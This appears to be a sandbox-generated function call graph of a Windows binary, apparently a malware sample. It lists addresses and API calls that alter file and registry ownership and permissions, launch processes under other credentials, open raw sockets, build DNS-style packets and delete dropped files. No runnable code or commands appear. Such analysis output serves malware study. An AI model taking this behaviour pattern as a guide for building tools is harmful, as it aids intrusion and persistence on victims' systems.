20300 4071b8 20285->20300 20287 406dc2 6 API calls 20286->20287 20290 4070d5 20287->20290 20288 40719b RegEnumValueA 20289 4071af RegCloseKey 20288->20289 20288->20290 20289->20300 20290->20288 20292 4071d0 20290->20292 20306 40f1a5 lstrlenA 20290->20306 20293 407205 RegCloseKey 20292->20293 20294 407227 20292->20294 20293->20300 20295 4072b8 ___ascii_stricmp 20294->20295 20296 40728e RegCloseKey 20294->20296 20297 4072cd RegCloseKey 20295->20297 20298 4072dd 20295->20298 20296->20300 20297->20300 20299 407311 RegCloseKey 20298->20299 20302 407335 20298->20302 20299->20300 20300->19950 20301 4073d5 RegCloseKey 20303 4073e4 20301->20303 20302->20301 20304 40737e GetFileAttributesExA 20302->20304 20305 407397 20302->20305 20304->20305 20305->20301 20307 40f1c3 20306->20307 20307->20290 20309 406e97 20308->20309 20310 406e5f LookupAccountNameW 20308->20310 20309->19954 20310->20309 20312 40eb17 20311->20312 20314 40eb21 20311->20314 20321 40eae4 20312->20321 20314->19992 20319 4069b9 WriteFile 20315->20319 20317 406a3c 20317->19988 20317->19989 20318 4069ff 20318->20317 20320 406a10 WriteFile 20318->20320 20319->20317 20319->20318 20320->20317 20320->20318 20322 40eb02 GetProcAddress 20321->20322 20323 40eaed LoadLibraryA 20321->20323 20322->20314 20323->20322 20324 40eb01 20323->20324 20324->20314 20326 401924 GetVersionExA 20325->20326 20326->20003 20328 406f55 20327->20328 20329 406eef AllocateAndInitializeSid 20327->20329 20328->20013 20330 406f44 20329->20330 20331 406f1c CheckTokenMembership 20329->20331 20330->20328 20334 406e36 2 API calls 20330->20334 20332 406f3b FreeSid 20331->20332 20333 406f2e 20331->20333 20332->20330 20333->20332 20334->20328 20336 40f0f1 20335->20336 20337 40f0ed 20335->20337 20338 40f119 20336->20338 20339 40f0fa lstrlenA SysAllocStringByteLen 20336->20339 20337->20035 20341 40f11c MultiByteToWideChar 20338->20341 20340 40f117 20339->20340 20339->20341 20340->20035 20341->20340 20343 401820 17 API calls 20342->20343 20344 4018f2 20343->20344 20345 4018f9 20344->20345 20359 401280 20344->20359 20345->20031 20347 401908 20347->20031 20372 401000 20348->20372 20350 401839 20351 401851 GetCurrentProcess 20350->20351 20352 40183d 20350->20352 20353 401864 20351->20353 20352->20022 20353->20022 20356 40920e 20354->20356 20358 409308 20354->20358 20355 4092f1 Sleep 20355->20356 20356->20355 20357 4092bf ShellExecuteA 20356->20357 20356->20358 20357->20356 20357->20358 20358->20031 20362 4012e1 ShellExecuteExW 20359->20362 20361 4016f9 GetLastError 20363 401699 20361->20363 20362->20361 20369 4013a8 20362->20369 20363->20347 20364 401570 lstrlenW 20364->20369 20365 4015be GetStartupInfoW 20365->20369 20366 4015ff CreateProcessWithLogonW 20367 4016bf GetLastError 20366->20367 20368 40163f WaitForSingleObject 20366->20368 20367->20363 20368->20369 20370 401659 CloseHandle 20368->20370 20369->20363 20369->20364 20369->20365 20369->20366 20371 401668 CloseHandle 20369->20371 20370->20369 20371->20369 20373 40100d LoadLibraryA 20372->20373 20384 401023 20372->20384 20374 401021 20373->20374 20373->20384 20374->20350 20375 4010b5 GetProcAddress 20376 4010d1 GetProcAddress 20375->20376 20377 40127b 20375->20377 20376->20377 20378 4010f0 GetProcAddress 20376->20378 20377->20350 20378->20377 20379 401110 GetProcAddress 20378->20379 20379->20377 20380 401130 GetProcAddress 20379->20380 20380->20377 20381 40114f GetProcAddress 20380->20381 20381->20377 20382 40116f GetProcAddress 20381->20382 20382->20377 20383 40118f GetProcAddress 20382->20383 20383->20377 20385 4011ae GetProcAddress 20383->20385 20384->20375 20392 4010ae 20384->20392 20385->20377 20386 4011ce GetProcAddress 20385->20386 20386->20377 20387 4011ee GetProcAddress 20386->20387 20387->20377 20388 401209 GetProcAddress 20387->20388 20388->20377 20389 401225 GetProcAddress 20388->20389 20389->20377 20390 401241 GetProcAddress 20389->20390 20390->20377 20391 40125c GetProcAddress 20390->20391 20391->20377 20392->20350 20394 40908d 20393->20394 20395 4090e2 wsprintfA 20394->20395 20396 40ee2a 20395->20396 20397 4090fd CreateFileA 20396->20397 20398 40911a lstrlenA WriteFile CloseHandle 20397->20398 20399 40913f 20397->20399 20398->20399 20399->20051 20399->20052 20401 40dbf0 20400->20401 20433 40db67 GetEnvironmentVariableA 20401->20433 20403 40dc19 20404 40db67 3 API calls 20403->20404 20409 40dcda 20403->20409 20405 40dc5c 20404->20405 20406 40db67 3 API calls 20405->20406 20405->20409 20407 40dc9b 20406->20407 20408 40db67 3 API calls 20407->20408 20407->20409 20408->20409 20409->20057 20411 40db55 20410->20411 20412 40db3a 20410->20412 20411->20059 20411->20064 20437 40ebed 20412->20437 20446 40f04e SystemTimeToFileTime GetSystemTimeAsFileTime 20414->20446 20416 40e3be 20416->20059 20418 40e342 20418->20416 20449 40de24 20418->20449 20420 40e528 20419->20420 20421 40e3f4 20419->20421 20420->20068 20422 40e434 RegQueryValueExA 20421->20422 20423 40e458 20422->20423 20424 40e51d RegCloseKey 20422->20424 20425 40e46e RegQueryValueExA 20423->20425 20424->20420 20425->20423 20426 40e488 20425->20426 20426->20424 20427 40db2e 8 API calls 20426->20427 20429 40e499 20427->20429 20428 40e4b9 RegQueryValueExA 20428->20429 20430 40e4e8 20428->20430 20429->20424 20429->20428 20429->20430 20430->20424 20431 40e332 14 API calls 20430->20431 20432 40e513 20431->20432 20432->20424 20434 40db89 lstrcpyA CreateFileA 20433->20434 20435 40dbca 20433->20435 20434->20403 20435->20403 20438 40ec01 20437->20438 20439 40ebf6 20437->20439 20440 40eba0 codecvt 2 API calls 20438->20440 20441 40ebcc 4 API calls 20439->20441 20442 40ec0a GetProcessHeap HeapReAlloc 20440->20442 20443 40ebfe 20441->20443 20444 40eb74 2 API calls 20442->20444 20443->20411 20445 40ec28 20444->20445 20445->20411 20460 40eb41 20446->20460 20450 40de3a 20449->20450 20455 40de4e 20450->20455 20464 40dd84 20450->20464 20453 40ebed 8 API calls 20458 40def6 20453->20458 20454 40de9e 20454->20453 20454->20455 20455->20418 20456 40de76 20468 40ddcf 20456->20468 20458->20455 20459 40ddcf lstrcmpA 20458->20459 20459->20455 20461 40eb54 20460->20461 20462 40eb4a 20460->20462 20461->20418 20463 40eae4 2 API calls 20462->20463 20463->20461 20465 40ddc5 20464->20465 20466 40dd96 20464->20466 20465->20454 20465->20456 20466->20465 20467 40ddad lstrcmpiA 20466->20467 20467->20465 20467->20466 20469 40de20 20468->20469 20470 40dddd 20468->20470 20469->20455 20470->20469 20471 40ddfa lstrcmpA 20470->20471 20471->20470 20473 40dd05 6 API calls 20472->20473 20474 40e821 20473->20474 20475 40dd84 lstrcmpiA 20474->20475 20476 40e82c 20475->20476 20477 40e844 20476->20477 20520 402480 20476->20520 20477->20084 20480 40dd05 6 API calls 20479->20480 20481 40df7c 20480->20481 20482 40dd84 lstrcmpiA 20481->20482 20483 40df89 20482->20483 20484 40dfc4 20483->20484 20485 40ddcf lstrcmpA 20483->20485 20486 40ec2e codecvt 4 API calls 20483->20486 20487 40dd84 lstrcmpiA 20483->20487 20484->20091 20485->20483 20486->20483 20487->20483 20489 40ea98 20488->20489 20529 40e8a1 20489->20529 20491 401e84 20491->20093 20493 4019d5 GetProcAddress GetProcAddress GetProcAddress 20492->20493 20496 4019ce 20492->20496 20494 401ab3 FreeLibrary 20493->20494 20495 401a04 20493->20495 20494->20496 20495->20494 20497 401a14 GetProcessHeap 20495->20497 20496->20097 20497->20496 20499 401a2e HeapAlloc 20497->20499 20499->20496 20500 401a42 20499->20500 20501 401a52 HeapReAlloc 20500->20501 20503 401a62 20500->20503 20501->20503 20502 401aa1 FreeLibrary 20502->20496 20503->20502 20504 401a96 HeapFree 20503->20504 20504->20502 20557 401ac3 LoadLibraryA 20505->20557 20508 401bcf 20508->20107 20510 401ac3 12 API calls 20509->20510 20511 401c09 20510->20511 20512 401c0d GetComputerNameA 20511->20512 20515 401c41 20511->20515 20513 401c45 GetVolumeInformationA 20512->20513 20514 401c1f 20512->20514 20513->20515 20514->20513 20514->20515 20515->20115 20517 40ee2a 20516->20517 20518 4030d0 gethostname gethostbyname 20517->20518 20519 401f82 20518->20519 20519->20121 20519->20122 20523 402419 lstrlenA 20520->20523 20522 402491 20522->20477 20524 402474 20523->20524 20525 40243d lstrlenA 20523->20525 20524->20522 20526 402464 lstrlenA 20525->20526 20527 40244e lstrcmpiA 20525->20527 20526->20524 20526->20525 20527->20526 20528 40245c 20527->20528 20528->20524 20528->20526 20530 40dd05 6 API calls 20529->20530 20531 40e8b4 20530->20531 20532 40dd84 lstrcmpiA 20531->20532 20533 40e8c0 20532->20533 20534 40e90a 20533->20534 20535 40e8c8 lstrcpynA 20533->20535 20536 402419 4 API calls 20534->20536 20545 40ea27 20534->20545 20537 40e8f5 20535->20537 20538 40e926 lstrlenA lstrlenA 20536->20538 20550 40df4c 20537->20550 20540 40e96a 20538->20540 20541 40e94c lstrlenA 20538->20541 20544 40ebcc 4 API calls 20540->20544 20540->20545 20541->20540 20542 40e901 20543 40dd84 lstrcmpiA 20542->20543 20543->20534 20546 40e98f 20544->20546 20545->20491 20546->20545 20547 40df4c 20 API calls 20546->20547 20548 40ea1e 20547->20548 20549 40ec2e codecvt 4 API calls 20548->20549 20549->20545 20551 40dd05 6 API calls 20550->20551 20552 40df51 20551->20552 20553 40f04e 4 API calls 20552->20553 20554 40df58 20553->20554 20555 40de24 10 API calls 20554->20555 20556 40df63 20555->20556 20556->20542 20558 401ae2 GetProcAddress 20557->20558 20561 401b68 GetComputerNameA GetVolumeInformationA 20557->20561 20559 401af5 20558->20559 20558->20561 20560 40ebed 8 API calls 20559->20560 20562 401b29 20559->20562 20560->20559 20561->20508 20562->20561 20562->20562 20563 40ec2e codecvt 4 API calls 20562->20563 20563->20561 20565 406ec3 2 API calls 20564->20565 20566 407ef4 20565->20566 20567 4073ff 17 API calls 20566->20567 20576 407fc9 20566->20576 20568 407f16 20567->20568 20568->20576 20577 407809 GetUserNameA 20568->20577 20570 407f63 20571 40ef1e lstrlenA 20570->20571 20570->20576 20572 407fa6 20571->20572 20573 40ef1e lstrlenA 20572->20573 20574 407fb7 20573->20574 20601 407a95 RegOpenKeyExA 20574->20601 20576->20134 20578 40783d LookupAccountNameA 20577->20578 20579 407a8d 20577->20579 20578->20579 20580 407874 GetLengthSid GetFileSecurityA 20578->20580 20579->20570 20580->20579 20581 4078a8 GetSecurityDescriptorOwner 20580->20581 20582 4078c5 EqualSid 20581->20582 20583 40791d GetSecurityDescriptorDacl 20581->20583 20582->20583 20584 4078dc LocalAlloc 20582->20584 20583->20579 20596 407941 20583->20596 20584->20583 20585 4078ef InitializeSecurityDescriptor 20584->20585 20587 407916 LocalFree 20585->20587 20588 4078fb SetSecurityDescriptorOwner 20585->20588 20586 40795b GetAce 20586->20596 20587->20583 20588->20587 20589 40790b SetFileSecurityA 20588->20589 20589->20587 20590 407980 EqualSid 20590->20596 20591 407a3d 20591->20579 20594 407a43 LocalAlloc 20591->20594 20592 4079be EqualSid 20592->20596 20593 40799d DeleteAce 20593->20596 20594->20579 20595 407a56 InitializeSecurityDescriptor 20594->20595 20597 407a62 SetSecurityDescriptorDacl 20595->20597 20598 407a86 LocalFree 20595->20598 20596->20579 20596->20586 20596->20590 20596->20591 20596->20592 20596->20593 20597->20598 20599 407a73 SetFileSecurityA 20597->20599 20598->20579 20599->20598 20600 407a83 20599->20600 20600->20598 20602 407ac4 20601->20602 20603 407acb GetUserNameA 20601->20603 20602->20576 20604 407da7 RegCloseKey 20603->20604 20605 407aed LookupAccountNameA 20603->20605 20604->20602 20605->20604 20606 407b24 RegGetKeySecurity 20605->20606 20606->20604 20607 407b49 GetSecurityDescriptorOwner 20606->20607 20608 407b63 EqualSid 20607->20608 20609 407bb8 GetSecurityDescriptorDacl 20607->20609 20608->20609 20611 407b74 LocalAlloc 20608->20611 20610 407da6 20609->20610 20618 407bdc 20609->20618 20610->20604 20611->20609 20612 407b8a InitializeSecurityDescriptor 20611->20612 20614 407bb1 LocalFree 20612->20614 20615 407b96 SetSecurityDescriptorOwner 20612->20615 20613 407bf8 GetAce 20613->20618 20614->20609 20615->20614 20616 407ba6 RegSetKeySecurity 20615->20616 20616->20614 20617 407c1d EqualSid 20617->20618 20618->20610 20618->20613 20618->20617 20619 407cd9 20618->20619 20620 407c5f EqualSid 20618->20620 20621 407c3a DeleteAce 20618->20621 20619->20610 20622 407d5a LocalAlloc 20619->20622 20624 407cf2 RegOpenKeyExA 20619->20624 20620->20618 20621->20618 20622->20610 20623 407d70 InitializeSecurityDescriptor 20622->20623 20625 407d7c SetSecurityDescriptorDacl 20623->20625 20626 407d9f LocalFree 20623->20626 20624->20622 20629 407d0f 20624->20629 20625->20626 20627 407d8c RegSetKeySecurity 20625->20627 20626->20610 20627->20626 20628 407d9c 20627->20628 20628->20626 20630 407d43 RegSetValueExA 20629->20630 20630->20622 20631 407d54 20630->20631 20631->20622 20633 40c525 20632->20633 20634 40c532 20632->20634 20633->20634 20637 40ec2e codecvt 4 API calls 20633->20637 20635 40c548 20634->20635 20784 40e7ff 20634->20784 20638 40e7ff lstrcmpiA 20635->20638 20645 40c54f 20635->20645 20637->20634 20639 40c615 20638->20639 20640 40ebcc 4 API calls 20639->20640 20639->20645 20640->20645 20641 40c5d1 20644 40ebcc 4 API calls 20641->20644 20643 40e819 11 API calls 20646 40c5b7 20643->20646 20644->20645 20645->20162 20647 40f04e 4 API calls 20646->20647 20648 40c5bf 20647->20648 20648->20635 20648->20641 20650 402692 inet_addr 20649->20650 20652 40268e 20649->20652 20651 40269e gethostbyname 20650->20651 20650->20652 20651->20652 20653 40f428 20652->20653 20787 40f315 20653->20787 20658 40c8d2 20656->20658 20657 40c907 20657->20196 20658->20657 20659 40c517 23 API calls 20658->20659 20659->20657 20660 40f43e 20661 40f473 recv 20660->20661 20662 40f458 20661->20662 20663 40f47c 20661->20663 20662->20661 20662->20663 20663->20179 20665 40c670 20664->20665 20666 40c67d 20664->20666 20667 40ebcc 4 API calls 20665->20667 20668 40ebcc 4 API calls 20666->20668 20670 40c699 20666->20670 20667->20666 20668->20670 20669 40c6f3 20669->20192 20669->20256 20670->20669 20671 40c73c send 20670->20671 20671->20669 20673 40c770 20672->20673 20674 40c77d 20672->20674 20675 40ebcc 4 API calls 20673->20675 20676 40c799 20674->20676 20677 40ebcc 4 API calls 20674->20677 20675->20674 20678 40c7b5 20676->20678 20679 40ebcc 4 API calls 20676->20679 20677->20676 20680 40f43e recv 20678->20680 20679->20678 20681 40c7cb 20680->20681 20682 40f43e recv 20681->20682 20683 40c7d3 20681->20683 20682->20683 20683->20256 20800 407db7 20684->20800 20687 407e96 20687->20256 20688 40f04e 4 API calls 20689 407e4c 20688->20689 20691 40f04e 4 API calls 20689->20691 20692 407e70 20689->20692 20690 40f04e 4 API calls 20690->20687 20691->20692 20692->20687 20692->20690 20694 406ec3 2 API calls 20693->20694 20695 407fdd 20694->20695 20696 4073ff 17 API calls 20695->20696 20697 4080c2 CreateProcessA 20695->20697 20698 407fff 20696->20698 20697->20244 20697->20245 20698->20697 20699 407809 21 API calls 20698->20699 20700 40804d 20699->20700 20700->20697 20701 40ef1e lstrlenA 20700->20701 20702 40809e 20701->20702 20703 40ef1e lstrlenA 20702->20703 20704 4080af 20703->20704 20705 407a95 24 API calls 20704->20705 20705->20697 20707 407db7 2 API calls 20706->20707 20708 407eb8 20707->20708 20709 40f04e 4 API calls 20708->20709 20710 407ece DeleteFileA 20709->20710 20710->20256 20712 40dd05 6 API calls 20711->20712 20713 40e31d 20712->20713 20804 40e177 20713->20804 20715 40e326 20715->20216 20717 4031f3 20716->20717 20727 4031ec 20716->20727 20718 40ebcc 4 API calls 20717->20718 20732 4031fc 20718->20732 20719 40344b 20720 403459 20719->20720 20721 40349d 20719->20721 20722 40f04e 4 API calls 20720->20722 20723 40ec2e codecvt 4 API calls 20721->20723 20724 40345f 20722->20724 20723->20727 20725 4030fa 4 API calls 20724->20725 20725->20727 20726 40ebcc GetProcessHeap HeapSize GetProcessHeap HeapAlloc 20726->20732 20727->20256 20728 40344d 20729 40ec2e codecvt 4 API calls 20728->20729 20729->20719 20731 403141 lstrcmpiA 20731->20732 20732->20719 20732->20726 20732->20727 20732->20728 20732->20731 20830 4030fa GetTickCount 20732->20830 20734 4030fa 4 API calls 20733->20734 20735 403c1a 20734->20735 20739 403ce6 20735->20739 20835 403a72 20735->20835 20738 403a72 9 API calls 20742 403c5e 20738->20742 20739->20256 20740 403a72 9 API calls 20740->20742 20741 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 20741->20742 20742->20739 20742->20740 20742->20741 20744 403a10 20743->20744 20745 4030fa 4 API calls 20744->20745 20746 403a1a 20745->20746 20746->20256 20748 40dd05 6 API calls 20747->20748 20749 40e7be 20748->20749 20749->20256 20751 40c105 20750->20751 20752 40c07e wsprintfA 20750->20752 20751->20256 20844 40bfce 20752->20844 20754 40c0ef 20755 40bfce wsprintfA 20754->20755 20755->20751 20757 407047 20756->20757 20758 406f88 LookupAccountNameA 20756->20758 20757->20256 20760 407025 20758->20760 20761 406fcb 20758->20761 20762 406edd 5 API calls 20760->20762 20764 406fdb ConvertSidToStringSidA 20761->20764 20763 40702a wsprintfA 20762->20763 20763->20757 20764->20760 20765 406ff1 20764->20765 20766 407013 LocalFree 20765->20766 20766->20760 20768 40dd05 6 API calls 20767->20768 20769 40e85c 20768->20769 20770 40dd84 lstrcmpiA 20769->20770 20771 40e867 20770->20771 20772 40e885 lstrcpyA 20771->20772 20846 4024a5 20771->20846 20849 40dd69 20772->20849 20778 407db7 2 API calls 20777->20778 20779 407de1 20778->20779 20780 407e16 20779->20780 20781 40f04e 4 API calls 20779->20781 20780->20256 20782 407df2 20781->20782 20782->20780 20783 40f04e 4 API calls 20782->20783 20783->20780 20785 40dd84 lstrcmpiA 20784->20785 20786 40c58e 20785->20786 20786->20635 20786->20641 20786->20643 20788 40ca1d 20787->20788 20789 40f33b 20787->20789 20788->20176 20788->20660 20790 40f347 htons socket 20789->20790 20791 40f382 ioctlsocket 20790->20791 20792 40f374 closesocket 20790->20792 20793 40f3aa connect select 20791->20793 20794 40f39d 20791->20794 20792->20788 20793->20788 20796 40f3f2 __WSAFDIsSet 20793->20796 20795 40f39f closesocket 20794->20795 20795->20788 20796->20795 20797 40f403 ioctlsocket 20796->20797 20799 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 20797->20799 20799->20788 20801 407dc8 InterlockedExchange 20800->20801 20802 407dc0 Sleep 20801->20802 20803 407dd4 20801->20803 20802->20801 20803->20688 20803->20692 20805 40e184 20804->20805 20806 40e2e4 20805->20806 20807 40e223 20805->20807 20820 40dfe2 20805->20820 20806->20715 20807->20806 20809 40dfe2 8 API calls 20807->20809 20813 40e23c 20809->20813 20810 40e1be 20810->20807 20811 40dbcf 3 API calls 20810->20811 20814 40e1d6 20811->20814 20812 40e21a CloseHandle 20812->20807 20813->20806 20824 40e095 RegCreateKeyExA 20813->20824 20814->20807 20814->20812 20815 40e1f9 WriteFile 20814->20815 20815->20812 20816 40e213 20815->20816 20816->20812 20818 40e2a3 20818->20806 20819 40e095 4 API calls 20818->20819 20819->20806 20821 40dffc 20820->20821 20823 40e024 20820->20823 20822 40db2e 8 API calls 20821->20822 20821->20823 20822->20823 20823->20810 20825 40e172 20824->20825 20827 40e0c0 20824->20827 20825->20818 20826 40e13d 20828 40e14e RegDeleteValueA RegCloseKey 20826->20828 20827->20826 20829 40e115 RegSetValueExA 20827->20829 20828->20825 20829->20826 20829->20827 20831 403122 InterlockedExchange 20830->20831 20832 40312e 20831->20832 20833 40310f GetTickCount 20831->20833 20832->20732 20833->20832 20834 40311a Sleep 20833->20834 20834->20831 20836 40f04e 4 API calls 20835->20836 20837 403a83 20836->20837 20839 403bc0 20837->20839 20840 403ac1 20837->20840 20843 403b66 lstrlenA 20837->20843 20838 403be6 20841 40ec2e codecvt 4 API calls 20838->20841 20839->20838 20842 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 20839->20842 20840->20738 20840->20739 20841->20840 20842->20839 20843->20837 20843->20840 20845 40bfd6 wsprintfA 20844->20845 20845->20754 20847 402419 4 API calls 20846->20847 20848 4024b6 20847->20848 20848->20772 20850 40dd79 lstrlenA 20849->20850 20850->20256 21453 417e70 21454 417eb4 21453->21454 21456 417ed8 __expand_base ___sbh_resize_block ___sbh_find_block 21454->21456 21457 418090 21454->21457 21458 4180d1 21457->21458 21460 4180a8 21457->21460 21459 416f00 FindHandlerForForeignException RtlEncodePointer 21458->21459 21461 4180e8 __encode_pointer 21459->21461 21460->21458 21462 416e30 __encode_pointer RtlEncodePointer 21460->21462 21461->21456 21462->21458 20972 421470 20973 421486 20972->20973 20975 421491 _CallSETranslator _UnwindNestedFrames 20973->20975 20976 429980 20973->20976 20979 42998d __getptd 20976->20979 20977 4299c8 ___FrameUnwindToState 20977->20975 20979->20977 20980 429ae0 20979->20980 20982 429afc 8 library calls 20980->20982 20983 429b96 10 library calls 20982->20983 20984 42a030 20982->20984 20983->20977 20985 42a049 __getptd 20984->20985 20987 42a044 CatchIt _inconsistency _CallSETranslator _GetRangeOfTrysToCheck 20984->20987 20985->20987 20988 416f00 20985->20988 20987->20983 20989 416e30 __encode_pointer RtlEncodePointer 20988->20989 20990 416f0c 20989->20990 20990->20987 21579 40877e 21580 408791 21579->21580 21581 40879f 21579->21581 21582 40f04e 4 API calls 21580->21582 21583 4087bc 21581->21583 21584 40f04e 4 API calls 21581->21584 21582->21581 21585 40e819 11 API calls 21583->21585 21584->21583 21586 4087d7 21585->21586 21595 408803 21586->21595 21600 4026b2 gethostbyaddr 21586->21600 21588 4087eb 21590 40e8a1 30 API calls 21588->21590 21588->21595 21590->21595 21593 40e819 11 API calls 21593->21595 21594 4088a0 Sleep 21594->21595 21595->21593 21595->21594 21596 4026b2 2 API calls 21595->21596 21598 40f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 21595->21598 21599 40e8a1 30 API calls 21595->21599 21605 40c4d6 21595->21605 21608 40c4e2 21595->21608 21611 402011 21595->21611 21646 408328 21595->21646 21596->21595 21598->21595 21599->21595 21601 4026fb 21600->21601 21602 4026cd 21600->21602 21601->21588 21603 4026e1 inet_ntoa 21602->21603 21604 4026de 21602->21604 21603->21604 21604->21588 21698 40c2dc 21605->21698 21609 40c2dc 11 API calls 21608->21609 21610 40c4ec 21609->21610 21610->21595 21612 402020 21611->21612 21613 40202e 21611->21613 21614 40f04e 4 API calls 21612->21614 21615 40204b 21613->21615 21616 40f04e 4 API calls 21613->21616 21614->21613 21617 40206e GetTickCount 21615->21617 21618 40f04e 4 API calls 21615->21618 21616->21615 21619 402090 21617->21619 21620 4020db GetTickCount 21617->21620 21622 402068 21618->21622 21623 4020d4 GetTickCount 21619->21623 21626 402684 2 API calls 21619->21626 21636 4020ce 21619->21636 21712 401978 21619->21712 21621 402132 GetTickCount GetTickCount 21620->21621 21633 4020e7 21620->21633 21625 40f04e 4 API calls 21621->21625 21622->21617 21623->21620 21624 40212b GetTickCount 21624->21621 21627 402159 21625->21627 21626->21619 21629 4021b4 21627->21629 21630 40e854 13 API calls 21627->21630 21631 40f04e 4 API calls 21629->21631 21632 40218e 21630->21632 21635 4021d1 21631->21635 21637 40e819 11 API calls 21632->21637 21633->21624 21638 401978 15 API calls 21633->21638 21639 402125 21633->21639 21717 402ef8 21633->21717 21640 4021f2 21635->21640 21642 40ea84 30 API calls 21635->21642 21636->21623 21641 40219c 21637->21641 21638->21633 21639->21624 21640->21595 21641->21629 21725 401c5f 21641->21725 21643 4021ec 21642->21643 21644 40f04e 4 API calls 21643->21644 21644->21640 21647 407dd6 6 API calls 21646->21647 21648 40833c 21647->21648 21649 406ec3 2 API calls 21648->21649 21673 408340 21648->21673 21650 40834f 21649->21650 21651 40846b 21650->21651 21652 40835c 21650->21652 21657 4084a7 RegOpenKeyExA 21651->21657 21684 408450 21651->21684 21653 4073ff 17 API calls 21652->21653 21671 408373 21653->21671 21654 40675c 21 API calls 21665 4085df 21654->21665 21655 408626 GetTempPathA 21656 408638 21655->21656 21797 406ba7 IsBadCodePtr 21656->21797 21659 4084c0 RegQueryValueExA 21657->21659 21660 40852f 21657->21660 21662 408521 RegCloseKey 21659->21662 21663 4084dd 21659->21663 21666 408564 RegOpenKeyExA 21660->21666 21679 4085a5 21660->21679 21661 4086ad 21664 408762 21661->21664 21667 407e2f 6 API calls 21661->21667 21662->21660 21663->21662 21672 40ebcc 4 API calls 21663->21672 21670 40ec2e codecvt 4 API calls 21664->21670 21664->21673 21665->21655 21665->21656 21665->21664 21668 408573 RegSetValueExA RegCloseKey 21666->21668 21666->21679 21676 4086bb 21667->21676 21668->21679 21669 40875b DeleteFileA 21669->21664 21670->21673 21671->21673 21677 4083ea RegOpenKeyExA 21671->21677 21671->21684 21675 4084f0 21672->21675 21673->21595 21675->21662 21678 4084f8 RegQueryValueExA 21675->21678 21676->21669 21685 4086e0 lstrcpyA lstrlenA 21676->21685 21681 4083fd RegQueryValueExA 21677->21681 21677->21684 21678->21662 21682 408515 21678->21682 21680 40ec2e codecvt 4 API calls 21679->21680 21679->21684 21680->21684 21686 40842d RegSetValueExA 21681->21686 21687 40841e 21681->21687 21683 40ec2e codecvt 4 API calls 21682->21683 21688 40851d 21683->21688 21684->21654 21684->21665 21689 407fcf 64 API calls 21685->21689 21690 408447 RegCloseKey 21686->21690 21687->21686 21687->21690 21688->21662 21691 408719 CreateProcessA 21689->21691 21690->21684 21692 40873d CloseHandle CloseHandle 21691->21692 21693 40874f 21691->21693 21692->21664 21694 407ee6 64 API calls 21693->21694 21695 408754 21694->21695 21696 407ead 6 API calls 21695->21696 21697 40875a 21696->21697 21697->21669 21699 40a4c7 4 API calls 21698->21699 21700 40c2e9 21699->21700 21701 40c300 GetTickCount 21700->21701 21702 40c326 21700->21702 21711 40c37f 21700->21711 21703 40c337 21701->21703 21702->21703 21704 40c32b GetTickCount 21702->21704 21707 40c363 GetTickCount 21703->21707 21703->21711 21704->21703 21705 40c4d2 21705->21595 21706 40c4ab InterlockedIncrement CreateThread 21706->21705 21708 40c4cb CloseHandle 21706->21708 21709 40c373 21707->21709 21707->21711 21708->21705 21710 40c378 GetTickCount 21709->21710 21709->21711 21710->21711 21711->21705 21711->21706 21713 40f428 14 API calls 21712->21713 21714 40198a 21713->21714 21715 401990 closesocket 21714->21715 21716 401998 21714->21716 21715->21716 21716->21619 21718 402d21 6 API calls 21717->21718 21719 402f01 21718->21719 21720 402f0f 21719->21720 21733 402df2 GetModuleHandleA 21719->21733 21722 402684 2 API calls 21720->21722 21724 402f1f 21720->21724 21723 402f1d 21722->21723 21723->21633 21724->21633 21729 401c80 21725->21729 21726 401cc2 wsprintfA 21728 402684 2 API calls 21726->21728 21727 401d1c 21727->21727 21730 401d47 wsprintfA 21727->21730 21728->21729 21729->21726 21729->21727 21732 401d79 21729->21732 21731 402684 2 API calls 21730->21731 21731->21732 21732->21629 21734 402e10 LoadLibraryA 21733->21734 21735 402e0b 21733->21735 21736 402e17 21734->21736 21735->21734 21735->21736 21737 402ef1 21736->21737 21738 402e28 GetProcAddress 21736->21738 21737->21720 21738->21737 21739 402e3e GetProcessHeap HeapAlloc 21738->21739 21740 402e62 21739->21740 21740->21737 21741 402ede GetProcessHeap HeapFree 21740->21741 21742 402e7f htons inet_addr 21740->21742 21743 402ea5 gethostbyname 21740->21743 21745 402ceb 21740->21745 21741->21737 21742->21740 21742->21743 21743->21740 21747 402cf2 21745->21747 21748 402d1c 21747->21748 21749 402d0e Sleep 21747->21749 21750 402a62 GetProcessHeap HeapAlloc 21747->21750 21748->21740 21749->21747 21749->21748 21751 402a92 21750->21751 21752 402a99 socket 21750->21752 21751->21747 21753 402cd3 GetProcessHeap HeapFree 21752->21753 21754 402ab4 21752->21754 21753->21751 21754->21753 21768 402abd 21754->21768 21755 402adb htons 21770 4026ff 21755->21770 21757 402b04 select 21757->21768 21758 402ca4 21759 402cb3 GetProcessHeap HeapFree closesocket 21758->21759 21759->21751 21760 402b3f recv 21760->21768 21761 402b66 htons 21761->21758 21761->21768 21762 402b87 htons 21762->21758 21762->21768 21765 402bf3 GetProcessHeap HeapAlloc 21765->21768 21766 402c17 htons 21785 402871 21766->21785 21768->21755 21768->21757 21768->21758 21768->21759 21768->21760 21768->21761 21768->21762 21768->21765 21768->21766 21769 402c4d GetProcessHeap HeapFree 21768->21769 21777 402923 21768->21777 21789 402904 21768->21789 21769->21768 21771 40271d 21770->21771 21772 402717 21770->21772 21774 402734 htons 21771->21774 21773 40ebcc 4 API calls 21772->21773 21773->21771 21775 4027cc htons htons sendto 21774->21775 21776 40278a 21774->21776 21775->21768 21776->21775 21778 402944 21777->21778 21780 40293d 21777->21780 21793 402816 htons 21778->21793 21780->21768 21781 402871 htons 21784 402950 21781->21784 21782 4029bd htons htons htons 21782->21780 21783 4029f6 GetProcessHeap HeapAlloc 21782->21783 21783->21780 21783->21784 21784->21780 21784->21781 21784->21782 21786 4028e3 21785->21786 21788 402889 21785->21788 21786->21768 21787 4028c3 htons 21787->21786 21787->21788 21788->21786 21788->21787 21790 402921 21789->21790 21791 402908 21789->21791 21790->21768 21792 402909 GetProcessHeap HeapFree 21791->21792 21792->21790 21792->21792 21794 40286b 21793->21794 21795 402836 21793->21795 21794->21784 21795->21794 21796 40285c htons 21795->21796 21796->21794 21796->21795 21798 406bc0 21797->21798 21799 406bbc 21797->21799 21800 40ebcc 4 API calls 21798->21800 21810 406bd4 21798->21810 21799->21661 21801 406be4 21800->21801 21802 406c07 CreateFileA 21801->21802 21803 406bfc 21801->21803 